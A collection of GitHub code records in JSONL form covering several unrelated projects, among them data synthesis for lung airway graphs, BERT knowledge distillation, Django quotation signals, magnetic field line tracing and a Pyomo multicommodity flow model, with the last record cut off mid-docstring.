# random selection with a condition\n graph_edges = list(graph)\n random.shuffle(graph_edges)\n idx = 0\n while True:\n edge = graph[graph_edges.pop(0)]\n if edge['point_number'] >= points_threshold:\n if radius_range[0] <= edge['radius_avg'] <= radius_range[1]:\n flag = self.data_process(pulse_id, volume, edge, idx)\n if flag:\n idx += 1\n if idx >= volume_num:\n break\n\n\ndef main_parser(args=sys.argv[1:]):\n # Parser definition\n parser = argparse.ArgumentParser(description=\"Parses command.\")\n\n # Parser Options\n parser.add_argument(\"-source_dir\", default='raw_data/', help=\"Path of the raw data\")\n parser.add_argument(\"-target_dir\", default='synthesized_data/', help=\"Path of the synthesized data\")\n parser.add_argument(\"-volume_num\", type=int, help=\"Set number of synthesized disconnected volumes per subject\")\n parser.add_argument(\"-radius_min\", type=float, default=0.,\n help=\"Set the minimum radius of the edge to be disconnected\")\n parser.add_argument(\"-radius_max\", type=float, default=50.,\n help=\"Set the maximum radius of the edge to be disconnected\")\n parser.add_argument(\"-points_threshold\", type=int, default=10.,\n help=\"Edges with fewer points than this threshold will be filtered\")\n options = parser.parse_args(args)\n\n if options.radius_min >= options.radius_max:\n parser.error(\"--radius_min cannot be equal or lager than radius_max\")\n\n return options\n\n\nif __name__ == '__main__':\n \"\"\"\n A simple command to run this script:\n \n python Data_Synthesis.py -source_dir raw_data/ -target_dir synthesized_data/ -volume_num=2 -radius_min=1 -radius_max=15 -points_threshold=10\n \"\"\"\n options = main_parser(sys.argv[1:])\n if len(sys.argv) == 1:\n print(\"Invalid option(s) selected! To get help, execute script with -h flag.\")\n exit()\n \n if not os.path.exists(options.target_dir):\n os.mkdir(options.target_dir)\n\n generater = DataSyn(source_dir=options.source_dir,\n target_dir=options.target_dir)\n generater.data_synthesis(volume_num=options.volume_num,\n radius_range=[options.radius_min, options.radius_max],\n points_threshold=options.points_threshold)\n\n","repo_name":"M3DV/pulmonary-tree-repairing","sub_path":"data_synthesis.py","file_name":"data_synthesis.py","file_ext":"py","file_size_in_byte":9919,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"79"} +{"seq_id":"1036905697","text":"#!/usr/bin/env python\n\n\"\"\"\nExtract lemma (and optionally POS tag) from XML output by Stanford CoreNLP\n\nUsage:\n\n$ ./lemtag.py \"xml/*.xml\" lemtag\n\nwhere \"xml/*.xml\" is a quoted glob pattern and 'lemtag' is an existing \noutput dir. \n\"\"\"\n\nfrom lxml import etree\nfrom codecs import open\nimport logging as log\n\n\ndef lemtag(in_fname, out_fname, with_pos=False):\n log.info(\"writing to \" + out_fname)\n outf = open(out_fname, \"wb\", encoding=\"utf-8\")\n \n context = etree.iterparse(in_fname)\n for action, elem in context:\n if elem.tag == \"lemma\":\n outf.write(elem.text)\n elif elem.tag == \"POS\":\n if with_pos:\n outf.write(\"/\" + elem.text + \"\\n\")\n else:\n outf.write(\"\\n\")\n \nif __name__ == \"__main__\":\n from sys import argv\n from glob import glob\n from os.path import splitext, basename, join\n \n log.basicConfig(level=log.DEBUG)\n \n for in_fname in glob(argv[1]):\n out_fname = splitext(basename(in_fname))[0] + \".lemtag\"\n out_fname = join(argv[2], out_fname)\n lemtag(in_fname, out_fname)\n \n ","repo_name":"emsrc/idiscape","sub_path":"annot/lemtag.py","file_name":"lemtag.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10360779260","text":"names = [\"leticia\", \"joão\", \"pedro\"]\nfor n in names:\n \n if n == \"joão\":\n continue\n print(n)\nletras = \"abc\"\nfor n in letras:\n print(n)\nfor x in range(2,10,6):\n print(x)\nfor i in range(5):\n for j in range(6):\n print(i,j)\n\nfor l in range(1,11):\n print(\"------------------------\")\n for l2 in range(1,11):\n total = l*l2\n print(l, \"x\", l2, \"=\", total)\nfor l in range(0,101,2):\n print(l)\na= int(input(\"Informe um número: \"))\nb= int(input(\"Informe um número: \"))\nfor x in range(a,b):\n print(x)","repo_name":"oppsggbarros/Fabrica_de_Software","sub_path":"Para.py","file_name":"Para.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"33522335616","text":"\nimport json\nfrom typing import Any, Dict\n\n\nclass Transformer:\n def transform_json(self, raw_json: str) -> str:\n data = json.loads(raw_json)\n data = self.transform(data)\n output = json.dumps(data)\n return output\n\n def transform(self, data: Dict[str, Any]) -> Dict[str, Any]:\n return data\n\n\nclass BlocksTransformer(Transformer):\n def transform(self, data: Dict[str, Any]) -> Dict[str, Any]:\n data.pop(\"pubKeyBitmap\", None)\n\n # Remove \"epochStartShardsData.pendingMiniBlockHeaders.reserved\".\n for shard_data in data.get(\"epochStartShardsData\", []):\n for miniblock_header in shard_data.get(\"pendingMiniBlockHeaders\", []):\n miniblock_header.pop(\"reserved\", None)\n\n return data\n\n\nclass TokensTransformer(Transformer):\n def transform(self, data: Dict[str, Any]) -> Dict[str, Any]:\n for key in list(data.keys()):\n is_volatile_field_nft = key.startswith(\"nft_\")\n is_volatile_field_api = key.startswith(\"api_\")\n\n if is_volatile_field_nft or is_volatile_field_api:\n data.pop(key)\n\n return data\n\n\nclass LogsTransformer(Transformer):\n def transform(self, data: Dict[str, Any]) -> Dict[str, Any]:\n events = data.get(\"events\", []) or []\n\n for event in events:\n topics = event.get(\"topics\", []) or []\n # Replace NULL values with empty strings, since BigQuery does not support NULL values in arrays (mode = REPEATED).\n event[\"topics\"] = [topic if topic is not None else \"\" for topic in topics]\n\n # We've altered the data in-place.\n return data\n","repo_name":"multiversx/multiversx-etl","sub_path":"multiversxetl/transformers.py","file_name":"transformers.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15411590505","text":"# -*- coding : utf-8 -*-\n\n##///////////////////////////////////##\n## T H E L I G H T P I A N O ##\n##\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\##\n\n#import time\n#import RPi.GPIO as GP\n\n\ndef disp(something) : #Displays the notes to play on the LED matrix\n\n\tprint(\"Unavailable function at the moment\")\n\n\treturn\n\n\n\ndef screen_disp(something) : # Displays something on a black and white small LCD display\n\n\tprint(\"Unavailable function at the moment\")\n\n\treturn\n\n\n\ndef greetings() : #Displays a greeting signal when turning on the device (+ the console)\n\n\tlog = open('logo.tlp','r') # Console signal\n\tlogo = log.read()\n\tlogo = logo.split('')[0]\n\tprint(logo)\n\tlog.close()\n\n\tscreen_disp('THE LIGHT PIANO')\n\n\tdisp('Welcome') # LED Signal - Pause\n\t\n\tscreen_disp('WELCOME')\n\n\treturn\n\n\ndef see_you() : #Displays a good bye signal when turning the device off (+ the console)\n\n\tlog = open('logo.tlp','r') # Console signal\n\tlogo = log.read()\n\tlogo = logo.split('')[1]\n\tprint(logo)\n\tlog.close()\n\n\tscreen_disp('SEE YOU SOON')\n\n\tdisp('SeeYouSoon') # LED signal - Pause\n\n\tscreen_disp('THE LIGHT PIANO')\n\n\treturn\n\n\n\n","repo_name":"bporteboeuf/master-python","sub_path":"projetS3/save_02.11.2015/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38789503474","text":"\nwith open(r\"01\\data.txt\", 'r') as file:\n data = [int(line) for line in file]\n \nfor n in data:\n for x in data:\n if n + x == 2020:\n print(n*x)\n\nprint(\"mao\")\n","repo_name":"rod007vrr/AdventOfCode","sub_path":"01/day1A.py","file_name":"day1A.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33734081571","text":"\"\"\"\nThe recursion process, is based on the visit of each folder, on each folder we keep the files that match the desired pattern and we keep on going deeper on the folder structure by launching subsequent calls to the function. The decision not to use the provided assistance to detect if it was a file or a folder, has been decided after not being able to properly use it (and also seeing the facility of coding my own solutions).\n\nTime and Space complexity\nIn therms of time complexity, trying to be guided by the Master theorem, tough not being able to quantify the size of n/b (as it's a folders depth and it needs not to be splitted proportionally). Thus, using another approach, the time complexity is dependant on the number of iterations that are launched. Being in this case dependent on depth and width of folders, resulting in a O(d*w). As for the space complexity, in this case, it is directly dependent on the number of returns the function does, hence, the number of found files f, O(f).\n\"\"\"\nimport os\n\ndef find_files(suffix, path):\n \"\"\"\n Find all files beneath path with file name suffix.\n\n Note that a path may contain further subdirectories\n and those subdirectories may also contain further subdirectories.\n\n There are no limit to the depth of the subdirectories can be.\n\n Args:\n suffix(str): suffix if the file name to be found\n path(str): path of the file system\n\n Returns:\n a list of paths\n \"\"\"\n if suffix == \"\":\n return []\n if len(os.listdir(path)) == 0:\n return []\n path_elements = os.listdir(path)\n path_files = [file for file in path_elements if \".\" + suffix in file]\n path_folders = [file for file in path_elements if \".\" not in file]\n\n for folder in path_folders:\n path_files.extend(find_files(suffix = suffix, path = path + '/' + folder))\n\n return None\n\n\n# Testing preparation\npath_base = os.getcwd() + '/testdir'\n\n# Normal Cases:\nprint(find_files(suffix='c', path=path_base))\n# ['t1.c', 'a.c', 'a.c', 'b.c']\n\nprint(find_files(suffix='h', path=path_base))\n# ['t1.h', 'a.h', 'a.h', 'b.h']\n\nprint(find_files(suffix='z', path=path_base))\n# []\n\n# Edge Cases:\nprint(find_files(suffix='', path=path_base))\n# []\n","repo_name":"Shuniy/Codes","sub_path":"P/P1/FileRecursion.py","file_name":"FileRecursion.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"30428063593","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport dipole # https://github.com/klaundal/dipole\nfrom pysymmetry.visualization import polarsubplot\nfrom mapping import trace_from_south_to_north\n\nRE = 6371.2e3\nd2r = np.pi / 180\n\n\n\n# MAKE MAGNETIC FIELD FUNCTIONS:\nget_main_dipole = lambda x: np.vstack(dipole.generic_dipole_field(x.T, np.array([0, 0, -30000e-9]), r0 = np.array([0, 0, 0]))).T\n\ndef get_B(x):\n main_dipole = get_main_dipole(x)\n\n # set up a perturbation field in the longitudinal direction, with an amplitude defined as a 2D gaussian:\n r0 = 5 * RE * 1e-3 # distance to the 2D gaussian in the z = 0 plane\n sig_r = 4 * RE * 1e-3 # sigma of the 2D gaussian in the radial direction in z = 0 plane\n sig_Z = 1 * RE * 1e-3 # sigma of 2D gaussian in Z direction\n A = 50e-9 # amplitude at r = r0, z = 0\n\n xx, yy, zz = x\n rr = np.sqrt(xx**2 + yy**2)\n gaussian = A * np.exp(- ((rr - r0)**2/(2 * sig_r**2) + zz**2 / (2 * sig_Z**2)) )\n theta = np.arctan2(yy, xx)\n Bx = -np.sin(theta) * gaussian\n By = np.cos(theta) * gaussian\n\n perturbation = np.zeros_like(main_dipole)\n perturbation[:, 0] = Bx\n perturbation[:, 1] = By\n B = main_dipole + perturbation\n return B\n\n\nweimer = pd.read_csv('weimer.txt', sep = ' ', skipinitialspace=True, comment = '#', names = ['mlat', 'mlt', 'R_E', 'phi'])\nweimer.phi = weimer.phi#*1e3\n#weimer = pd.read_csv('pot_Anders_Ohma_082219_1_t300.csv', sep = ',', skipinitialspace=True, comment = '#', names = ['mlat', 'mlt', 'R_E', 'phi'])\n\nV = np.vstack(( weimer[weimer.mlat > 0].phi.values, weimer[weimer.mlat < 0].phi.values)) * 1e-3\nlat = np.abs(np.vstack((weimer[weimer.mlat > 0].mlat.values, weimer[weimer.mlat < 0].mlat.values)))\nlon = np.abs(np.vstack((weimer[weimer.mlat > 0].mlt .values, weimer[weimer.mlat < 0].mlt .values))) * 15 \ndisplacement = displacement_field.Displacement_field(V, lat, lon, theta0 = 40.01, Kmax = 20, Mmax = 15 , corotation_included = False, latlim = 80) \n\n\n\nfig, axes = plt.subplots(ncols = 2)\npp = polarsubplot.Polarsubplot(axes[0])\n\nxx, yy = np.meshgrid(np.linspace(-1, 1, 12), np.linspace(-1, 1, 12))\n#yy = np.linspace(-1, 1, 12)\n#xx = np.zeros_like(yy)\niii = xx**2 + yy**2 < 1\nxx, yy = xx[iii], yy[iii]\nlat, mlt = pp._XYtomltMlat(xx, yy)\nlat = -lat\n\npp.scatter(lat, mlt)\nconj_lat_dip, conj_lon_dip = trace_from_south_to_north(get_main_dipole, lat, mlt*15, height = 0, t_bound = 130 * RE * 1e18)\npp.scatter(conj_lat_dip, conj_lon_dip / 15, s = 3)\n\nprint('done dipole')\n\npp2 = polarsubplot.Polarsubplot(axes[1])\n\nconj_lat, conj_lon = trace_from_south_to_north(get_B, lat, mlt*15, height = 0, t_bound = 130 * RE * 1e32)\n\niii = conj_lat > 0\n\npp2.scatter(lat[iii], mlt[iii])\npp2.scatter(conj_lat[iii], conj_lon[iii] / 15, s = 3)\n#print('mapped from %s, %s to %s, %s' % (lats, lons, list(conj_lat), list(conj_lon)))\n\nplt.show()","repo_name":"klaundal/displacement_field","sub_path":"synthetic_test.py","file_name":"synthetic_test.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74745262015","text":"#! -*- coding: utf-8 -*-\n\"\"\"\n@Author: Gump\n@Create Time: 20230214\n@Info: main\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport pandas as pd\nimport tensorflow as tf\nfrom bert import tokenization\nfrom bert.modeling import BertConfig\n\nfrom processing import DataProcess, input_fn_builder\nfrom model import model_fn_builder\nfrom utils import serving_input_fn\n\n\nos.environ['CUDA_VISIBLE_DEVICES'] = '3' # 配置显卡\n\nflags = tf.flags\nargs = flags.FLAGS\n\nflags.DEFINE_string(\n 'data_dir', '../data/', 'The input data dir. Should be tfrecoder file'\n)\nflags.DEFINE_string(\n 'output_dir', '../model_saved',\n 'The output dir where the teacher model checkpoints will be written'\n)\n\n# teacher config\nflags.DEFINE_string(\n 'teacher_bert_config_file', 'pretrained_models/Roberta-large/student_bert_config.json',\n 'The config json file for teacher model'\n)\n\nflags.DEFINE_string(\n 'teacher_init_checkpoint', 'pretrained_models/Roberta-large/bert_model.ckpt',\n 'init checkpoint for teacher model'\n)\n\n# student config\nflags.DEFINE_string(\n 'student_bert_config_file', None, 'The config json file for student model'\n)\nflags.DEFINE_string(\n 'student_init_checkpoint', None,\n 'init checkpoint for student model'\n)\nflags.DEFINE_float(\n 'temperature', 2.0, 'temperature for softmax'\n)\nflags.DEFINE_float(\n 'alpha_ce', 0.33, 'weight for cross entropy loss'\n)\nflags.DEFINE_float(\n 'alpha_kl', 0.33, 'weight for cross KL loss'\n)\nflags.DEFINE_float(\n 'alpha_cos', 0.33, 'weight for cosine loss'\n)\n\n# public flags\nflags.DEFINE_string(\n 'vocab_file', '../pretrained_models/Roberta-large/vocab.txt', 'BERT vocabulary file'\n)\nflags.DEFINE_integer(\n 'max_seq_length', 128, 'The maximum length of input sequence'\n)\nflags.DEFINE_bool(\n 'do_train', True, 'Whether to run training'\n)\nflags.DEFINE_bool(\n 'do_eval', True, 'Whether to run eval on dev data'\n)\nflags.DEFINE_bool(\n 'do_predict', True, 'Whether to run predict on predict data'\n)\nflags.DEFINE_bool(\n 'do_export', True, 'Whether to export model'\n)\nflags.DEFINE_string(\n 'export_dir', './', 'where to save .pb model file'\n)\nflags.DEFINE_string(\n 'training_mode', 'distill', 'select from [`training_teacher`, `distill`, `eval_student_model`, `export`]'\n)\n\nflags.DEFINE_integer(\n 'batch_size', 8, 'train batch size'\n)\nflags.DEFINE_float(\n 'learning_rate', 2e-5, 'The initial learning rate for adam'\n)\nflags.DEFINE_float(\n 'num_train_epochs', 3, 'Total number of training epochs'\n)\nflags.DEFINE_float(\n 'warmup_proportion', 0.1, 'Proportion of training to perform linear learning rate warmup for'\n)\nflags.DEFINE_integer(\n 'save_checkpoints_steps', 4000, 'how often to save model checkpoint'\n)\n\n\ndef main(_):\n tf.logging.set_verbosity(tf.logging.INFO)\n\n # 数据加载\n tokenizer = tokenization.FullTokenizer(vocab_file=args.vocab_file, do_lower_case=True)\n processor = DataProcess(tokenizer=tokenizer, args=args)\n\n num_train_steps, num_warmup_steps, examples = None, None, -1\n origin_train_file = os.path.join(args.data_dir, 'origin', 'train.csv')\n tf_record_file = os.path.join(args.data_dir, 'tf_record', 'train.tfrecord')\n save_checkpoints_steps = args.save_checkpoints_steps\n if args.do_train:\n examples = processor.read_file(origin_train_file)\n processor.write_tf_record_data(output_file=tf_record_file, examples=examples)\n\n tf.logging.info('####train data length#######', len(examples))\n num_train_steps = int(len(examples) / args.batch_size * args.num_train_epochs)\n save_checkpoints_steps = int(len(examples) / args.batch_size)\n num_warmup_steps = int(num_train_steps * args.warmup_proportion)\n\n # estimator配置\n sess_config = tf.ConfigProto(allow_soft_placement=True,\n log_device_placement=False)\n sess_config.gpu_options.allow_growth = True\n run_config = tf.estimator.RunConfig(model_dir=args.output_dir,\n save_checkpoints_steps=save_checkpoints_steps\n ).replace(session_config=sess_config)\n\n teacher_bert_config = BertConfig.from_json_file(args.teacher_bert_config_file)\n if args.student_bert_config_file is not None:\n student_bert_config = BertConfig.from_json_file(args.student_bert_config_file)\n else:\n student_bert_config = None\n model_fn = model_fn_builder(teacher_bert_config=teacher_bert_config,\n student_bert_config=student_bert_config,\n teacher_init_checkpoint=args.teacher_init_checkpoint,\n student_init_checkpoint=args.student_init_checkpoint)\n\n params = {'learning_rate': args.learning_rate, 'num_warmup_steps': num_warmup_steps,\n 'batch_size': args.batch_size, 'num_train_steps': num_train_steps,\n 'training_mode': args.training_mode, 'alpha_ce': args.alpha_ce, 'alpha_kl': args.alpha_kl,\n 'alpha_cos': args.alpha_cos, 'temperature': args.temperature}\n\n estimator = tf.estimator.Estimator(model_fn=model_fn, config=run_config, params=params)\n\n if args.do_train:\n tf.logging.info(\"***** Running training *****\")\n tf.logging.info(\" Num examples = %d\", len(examples))\n tf.logging.info(\" Batch size = %d\", args.batch_size)\n tf.logging.info(\" Num steps = %d\", num_train_steps)\n train_input_fn = input_fn_builder(input_file=tf_record_file, is_training=True, seq_length=args.max_seq_length)\n estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)\n\n if args.do_eval:\n dev_file = os.path.join(args.data_dir, 'origin', 'eval.csv')\n record_eval_file = os.path.join(args.data_dir, 'tf_record', 'eval.tfrecord')\n eval_examples = processor.read_file(dev_file)\n processor.write_tf_record_data(record_eval_file, eval_examples)\n eval_steps = int(len(eval_examples) // args.batch_size)\n\n tf.logging.info(\"***** Running training *****\")\n tf.logging.info(\" Num examples = %d\", len(eval_examples))\n tf.logging.info(\" Num steps = %d\", eval_steps)\n\n eval_input_fn = input_fn_builder(input_file=record_eval_file, is_training=False, seq_length=args.max_seq_length)\n result = estimator.evaluate(input_fn=eval_input_fn, steps=eval_steps) # checkpoint_path=''\n tf.logging.info(\"eval precision: %.2f\", result['eval_accuracy'])\n tf.logging.info(\"teacher eval precision: %.2f\", result['teacher_accuracy']) # None for training teacher model\n tf.logging.info(\"eval loss: %.2f\", result['eval_loss'])\n\n if args.do_predict:\n dev_file = os.path.join(args.data_dir, 'origin', 'eval.csv')\n record_eval_file = os.path.join(args.data_dir, 'tf_record', 'eval.tfrecord')\n eval_examples = processor.read_file(dev_file)\n processor.write_tf_record_data(record_eval_file, eval_examples)\n eval_input_fn = input_fn_builder(input_file=record_eval_file, is_training=False, seq_length=args.max_seq_length)\n checkpoint = '../model_saved/student_model/model.ckpt-12000'\n result = estimator.predict(input_fn=eval_input_fn, checkpoint_path=checkpoint)\n pred_labels, pred_scores = [], []\n for res in result:\n probabilities = res['probabilities']\n prob_label = probabilities.argmax(0)\n prob_score = probabilities[prob_label]\n pred_labels.append(prob_label)\n pred_scores.append(prob_score)\n\n df = pd.read_csv(dev_file, sep='\\t')\n df['pred_labels'] = pred_labels\n df['pred_scores'] = pred_scores\n df.to_csv('test_pred.csv', encoding='utf_8_sig', index=False)\n\n # export model\n if args.do_export:\n # select best model\n dev_file = os.path.join(args.data_dir, 'origin', 'eval.csv')\n record_eval_file = os.path.join(args.data_dir, 'tf_record', 'eval.tfrecord')\n eval_examples = processor.read_file(dev_file)\n processor.write_tf_record_data(record_eval_file, eval_examples)\n eval_steps = int(len(eval_examples) // args.batch_size)\n eval_input_fn = input_fn_builder(input_file=record_eval_file, is_training=False, seq_length=args.max_seq_length)\n best_checkpoint = (0.0, '')\n for file in os.listdir(args.output_dir):\n if file.endswith('index'):\n checkpoint = os.path.join(args.output_dir, file[:-6])\n result = estimator.evaluate(input_fn=eval_input_fn, steps=eval_steps, checkpoint_path=checkpoint)\n tf.logging.info(\"eval precision: %.2f\", result['eval_accuracy'])\n tf.logging.info(\"teacher eval precision: %.2f\", result['teacher_accuracy'])\n tf.logging.info(\"eval loss: %.2f\", result['eval_loss'])\n if result['eval_accuracy'] > best_checkpoint[0]:\n best_checkpoint = (result['eval_accuracy'], checkpoint)\n\n tf.logging.info('save best checkpoint {}, eval score: {}'.format(best_checkpoint[1], best_checkpoint[0]))\n estimator.export_saved_model(args.export_dir, serving_input_fn, checkpoint_path=best_checkpoint[1])\n\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"gump1368/distiller","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17090860672","text":"#!/usr/bin/env python3\n\ndef rangify(numbers):\n if not numbers:\n return\n\n numbers = sorted(set(numbers))\n\n ranges = []\n start = numbers[0]\n\n try:\n for n in range(len(numbers)):\n if numbers[n+1] - numbers[n] == 1:\n continue\n end = numbers[n]\n ranges.append((start, end))\n start = numbers[n+1]\n\n except IndexError as e:\n end = numbers[-1]\n\n ranges.append((start, end))\n\n return ranges\n\n\ndef textify(ranges):\n texts = []\n for start, end in ranges:\n if start == end:\n texts.append(f\"{start}\")\n else:\n texts.append(f\"{start}-{end}\")\n return ','.join(texts)\n\n\nfor numbers in [[],\n [1],\n [1,1],\n [1,2],\n [2,1],\n [1,4,5,8],\n [1,2,4,8],\n [8,4,2,1],\n [1,2,3,3,3,5,8,8,8,13,13,13,14,15,16,17]]:\n if numbers:\n print(textify(rangify(numbers)))\n","repo_name":"rafalmierzwiak/yearn","sub_path":"code/textify_that_list.py","file_name":"textify_that_list.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"17467272369","text":"import ctypes as ct\nimport torch\nimport ampere\n\ndef get_ptr(A: torch.Tensor) -> ct.c_void_p:\n if A is None:\n return None\n else:\n return ct.c_void_p(A.data.data_ptr())\n\nlib = ct.cdll.LoadLibrary('/home/fernand/sparse_learning/libsparse.so')\nlib.get_context.restype = ct.c_void_p\ncontext = ct.c_void_p(lib.get_context())\n\nA = torch.rand((128*128, 4096), dtype=torch.float16, device=torch.device(0))\nmask = ampere.create_mask(A)\nB = torch.rand((10240, 4096), dtype=torch.float16, device=torch.device(0))\nC = torch.zeros((128*128, 10240), dtype=torch.float16, device=torch.device(0))\n\nlib.sparse_matmul(context, get_ptr(A), get_ptr(B), get_ptr(C), A.shape[0], A.shape[1], B.shape[0], B.shape[1])\nprint((mask * A).matmul(B.T))\nprint(C)","repo_name":"fernand/sparse_learning","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25160779968","text":"from django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom measurement.measures import Distance\n\nfrom .models import Quotation, Quartering\nfrom ..products.models import Composition, Rule\n\n# Dict for select arithmetic symbol\noperations = {Rule.Operation.SUM: '+', Rule.Operation.SUBTRACT: '-', Rule.Operation.MULTIPLY: '*'}\n\n\n# Trigger for post save in quotation\n@receiver(post_save, sender=Quotation)\ndef create_quartering_for_quotation(sender, instance, created, **kwargs):\n if created:\n quartering_list = []\n accumulated_price = 0\n # For each composition in the product's quotation\n for composition in Composition.objects.select_related('product').filter(product=instance.product):\n # Only if the material is mesurable, we need to calculate the mesures\n if composition.material.is_measurable:\n # Get measures in cm\n width = instance.width.cm\n high = instance.high.cm\n depth = instance.depth.cm\n # For each rule of the composition apply the operation in each attribute\n for rule in Rule.objects.select_related('composition').filter(composition=composition):\n operation = operations[rule.operation]\n rule_value = rule.value\n if rule.attribute == Rule.Attribute.WIDTH:\n width = eval(f'{width} {operation} {rule_value}')\n elif rule.attribute == Rule.Attribute.HIGH:\n high = eval(f'{high} {operation} {rule_value}')\n elif rule.attribute == Rule.Attribute.DEPTH:\n depth = eval(f'{depth} {operation} {rule_value}')\n # Validate position and assign 0 to the correct side, ej: doors doesn't have depth\n if composition.position == Composition.Position.SIDE:\n width = 0\n elif composition.position == Composition.Position.BASE:\n high = 0\n elif composition.position == Composition.Position.FRONT:\n depth = 0\n quartering = Quartering(\n width=Distance(cm=width),\n high=Distance(cm=high),\n depth=Distance(cm=depth),\n quotation=instance,\n composition=composition,\n quantity=composition.quantity\n )\n # The quartering price is pondered from the material price\n quartering.price = composition.material.price_per_unit * quartering.area\n accumulated_price += quartering.price * composition.quantity\n quartering_list.append(quartering)\n # Otherwise the quartering is just the material without measure\n else:\n price = composition.material.price\n quartering = Quartering(\n price=price,\n quotation=instance,\n composition=composition,\n quantity=composition.quantity\n )\n accumulated_price += price * composition.quantity\n quartering_list.append(quartering)\n Quartering.objects.bulk_create(quartering_list)\n instance.total_price = accumulated_price\n instance.save()\n","repo_name":"nlemarodriguez/despieces","sub_path":"apps/quotations/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3283693299","text":"import os\nfrom datetime import datetime\n\nfrom pyomo.environ import *\nimport pyomo.environ as pyo\nimport fileReading_PPNR\n\n'''\nNode balances = [[value for each comodity] for each node]\n\nedges = [[i,j] for each (i,j) in A ] (i,j) means that the edge goes from i to j\nEdge costs = dictionary, edge_cost[[i,j]]=val\nEdge capacities = dictionary, edge_capacities[[i,j]]=val\n'''\n\n\ndef linear_programming_MCMCF(nodes, edges, commodities, arc_cost, single_comodity_capacity, supply,mutual_capacities, start_nodes, end_nodes):\n #print(nodes_balances)\n #print(edge_costs)\n #print(edge_capacities)\n\n # Parametri\n model = ConcreteModel()\n model.commodities = commodities\n model.nodes_balances = supply\n model.edges = edges\n model.nodes = nodes\n model.edge_costs = arc_cost\n model.start_nodes=start_nodes\n model.end_nodes=end_nodes\n model.edge_capacities = single_comodity_capacity\n model.mutual_capacities=mutual_capacities\n\n # Variabile\n model.x = Var(model.edges, model.commodities, within=pyo.PositiveReals)\n\n # Funzione obiettivo\n def obj_rule(model):\n return (sum(model.x[edge, k]*model.edge_costs[(k,edge)] for edge in model.edges for k in commodities))\n\n model.obj = Objective(expr=obj_rule(model), sense=minimize)\n\n # Vincoli\n model.balances_constraint = ConstraintList()\n for k in model.commodities:\n for n in model.nodes:\n entering_edges = []\n exiting_edges = []\n for edge in model.edges:\n if start_nodes[edge] == n:\n exiting_edges.append(edge)\n if end_nodes[edge] == n:\n entering_edges.append(edge)\n model.balances_constraint.add(\n (sum(model.x[edge, k] for edge in entering_edges) - sum(\n model.x[edge, k] for edge in exiting_edges)) == model.nodes_balances[(k, n)])\n\n model.bundle_constraint = ConstraintList()\n for edge in edges:\n model.balances_constraint.add(\n sum(model.x[edge, k] for k in commodities) <= model.mutual_capacities[edge]\n )\n\n opt = pyo.SolverFactory('cplex')\n opt.options['lpmethod'] = 1\n opt.options['preprocessing presolve'] ='n'\n path = os.path.join('log', str(datetime.today().strftime('Resolution_%d-%m-%y_%H-%M-%S.log')))\n opt.solve(model, logfile=path)\n print_solution(model)\n\n\ndef print_solution(model):\n for k in model.commodities:\n print(\"--- \", k, \"---\")\n for edge in model.edges:\n print(model.start_nodes[edge], model.end_nodes[edge], k, \"-\", str(model.x[edge, k].value))\n\n for edge in model.edges:\n summ = sum(model.x[edge, k].value for k in model.commodities)\n difference =summ - model.mutual_capacities[edge]\n if (difference > 0.00001):\n print(\"UNFEASABLE EDGE: \", edge, \" VALUE \", summ - model.edge_capacities[0,edge])\n\n for k in model.commodities:\n for n in model.nodes:\n entering_edges = []\n exiting_edges = []\n for edge in model.edges:\n if start_nodes[edge] == n:\n exiting_edges.append(edge)\n if end_nodes[edge] == n:\n entering_edges.append(edge)\n difference = (sum(model.x[edge, k].value for edge in entering_edges) - sum(\n model.x[edge, k].value for edge in exiting_edges)) - model.nodes_balances[(k, n)]\n if (abs(difference) > 0.00001):\n print(\"BALANCES NOT HANDLED CORRECTLY FOR NODE \",n,\"AND COMMODITY \",k,\" WITH ERROR OF: \",abs(difference))\n\n\n\nif __name__ == '__main__':\n (num_nodes, num_arches, num_comodities, arc_cost, single_comodity_capacity, supply,mutual_capacities, start_nodes, end_nodes) = fileReading_PPNR.load_problem(\"datasets/minsil7.dat\")\n '''\n nodes_balances=[[0 for j in range(COMMODITY_COUNT)] for i in range(NODE_COUNT)]\n nodes_balances[0][0]=-1\n nodes_balances[4][0] = 1\n\n nodes_balances[1][1] = -1\n nodes_balances[4][1] = 1\n\n edges=[(0,1),(0,2),(0,3),(3,4),(2,4),(1,4)]\n edge_costs=dict()\n for edge in edges:\n edge_costs[edge]=1\n edge_capacities=dict()\n for edge in edges:\n edge_capacities[edge]=1'''\n 